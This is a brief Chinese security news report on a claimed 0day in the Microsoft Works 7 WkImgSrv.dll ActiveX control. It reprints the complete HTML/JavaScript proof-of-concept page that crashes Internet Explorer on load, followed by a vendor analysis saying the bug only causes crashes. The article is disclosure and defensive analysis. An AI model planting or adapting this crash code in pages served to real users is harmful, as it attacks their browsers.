近日，有计算机用户反映了一个Windows 0Day漏洞，并出了相关代码：

　　[0day]Microsoft Works 7 WkImgSrv.dll crash POC，dll版本7.03.0616.0，IE7+Windows XP SP2 测试通过。

　　[html]

　　[head]

　　[title]Microsoft Works 7 WkImgSrv.dll crash POC[/title]

　　[script language="JavaScript"]

　　function payload() {

　　var num = -1;

　　obj.WksPictureInterface = num;

　　}

　　[/script]

　　[/head]

　　[body onload="JavaScript: return payload();"]

　　[object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj"]

　　[/object]

　　[/body]

　　[/html]

　　金山毒霸研发中心分析如下：

　　近几天网络上流传着一个传说为IE 0DAY的POC代码，在Windows XP系统环境下通杀了IE6和IE7，其它系统并未经过测试。其实这个漏洞并不是存在于IE，而是Microsoft Works的组件被挖掘出漏洞，部分的Windows XP预装了Microsoft Works，所以就出现了过全补丁系统的漏洞（如华硕易PC 就预装了Microsoft Works）。这段攻击代码会让浏览器崩溃，目前尚不能因此传播恶意软件。

• 2008-09-02湖北省审计厅审计医保信息系统发现漏洞
• 2008-09-02苹果重视功能多于安全 iPhone漏洞迟迟不修复
• 2008-09-01iPhone漏洞即使上锁也能被窃取资料
• 2008-08-29高调维稳下系统仍漏洞百出 证监会扮黑客四基金中弹
• 2008-08-28Internet另一超级漏洞被公布 危害更甚DNS 漏洞
• 2008-08-27美国反恐情报资料库有重大漏洞 几乎快作不下去